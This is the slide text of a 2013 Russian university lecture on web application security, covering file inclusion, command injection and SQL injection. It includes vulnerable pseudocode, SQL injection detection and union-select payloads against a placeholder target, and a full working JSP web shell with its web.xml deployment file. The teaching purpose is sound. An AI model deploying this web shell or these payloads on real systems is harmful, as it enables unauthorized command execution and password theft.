Безопасность интернет-приложений осень 2013 лекция 3
TRANSCRIPT
2
Гипотеза
Проверка
Цель достигнута
да
нет
3
GET/POST – параметры
Cookies
Headers
File uploads
External sources
4
- LFI/RFI- Command injection- SQL Injection- Загрузка произвольного файла
5
http://target.com?getfile=valid
http://target.com?getfile=invalid
…Name = query;Print(LoadFile(Name));…
6
http://target.com?getfile=index
7
http://target.com?getfile=index
http://target.com?getfile=target
8
…Name = query + “.txt”;Print(LoadFile(Name));…
9
…Name = query + “.txt”;Print(LoadFile(Name));…
10
…Param = query;System(“ping –c 1 ”+param);…
11
…Param = query;System(“ping –c 1 ”+param);…
12
…Param = query;System(“ping –c 1 ”+param);…
13
…Q = “select username from users where id=“ + req_id;print(db_query(Q));…
Detect:‘ and 1=1 / ‘ and 1=0‘ and benchmark (9999999,md5(1))
Exploit:‘ union select 1,2,3,4,5 from table2 – comment out
http://target.com/?id=-1 union select password from users -- c
select username from users where id=-1 union select password from users -- c
14
Сканирование:
15
Идентификация:
16
Уязвимость:
17
Уязвимость:
18
Эксплуатация:
19
cmd.jsp:
<%@ page import="java.util.*,java.io.*"%><%%><HTML><BODY>Commands with JSP<FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%if (request.getParameter("cmd") != null) {out.println("Command: " + request.getParameter("cmd") + "<BR>");Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine();while ( disr != null ) {out.println(disr);disr = dis.readLine();}}%></pre></BODY></HTML>
20
WEB-INF/web.xml:
<?xml version="1.0" ?><web-app xmlns="http://java.sun.com/xml/ns/j2ee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://java.sun.com/xml/ns/j2eehttp://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"version="2.4"><servlet><servlet-name>Command</servlet-name><jsp-file>/cmd.jsp</jsp-file></servlet></web-app>
21
Эксплуатация:
22
Эксплуатация:
23
Результат: